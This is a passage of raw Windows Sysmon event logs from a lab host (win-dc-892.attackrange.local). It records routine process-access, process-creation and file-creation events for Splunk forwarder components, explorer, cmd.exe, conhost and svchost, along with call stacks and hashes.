Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.626{266CAFBE-669B-6064-7A01-00000000AE01}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.281{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02E65C93CD2225AFD9322BEF74798082,SHA256=298969026E1A1CCFF3D4FD38FD824861D3F1FEA4D683A0E803CD757BC51AFACC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.797{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF565AD6DE8DE031DDEA2EBFE33646FD,SHA256=7588D0BA742219962096E323EC3C4773AAD5035331A22F8CCCE239A79542A62F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.703{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-669C-6064-7D01-00000000AE01}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.703{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.703{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.703{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.703{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.703{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-669C-6064-7D01-00000000AE01}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.703{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-669C-6064-7D01-00000000AE01}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.704{266CAFBE-669C-6064-7D01-00000000AE01}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000011333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.672{266CAFBE-64C4-6064-9B00-00000000AE01}49244140C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000011332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.672{266CAFBE-64C4-6064-9B00-00000000AE01}49244140C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000011331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.672{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-669C-6064-7C01-00000000AE01}4320C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-669C-6064-7C01-00000000AE01}4320C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+9dc4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+9dc4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7C01-00000000AE01}4320C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7C01-00000000AE01}4320C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7C01-00000000AE01}4320C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7C01-00000000AE01}4320C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.625{266CAFBE-646C-6064-1000-00000000AE01}11242204C:\Windows\system32\svchost.exe{266CAFBE-669C-6064-7C01-00000000AE01}4320C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.625{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-669C-6064-7C01-00000000AE01}4320C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.609{266CAFBE-669C-6064-7C01-00000000AE01}43205536C:\Windows\system32\conhost.exe{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 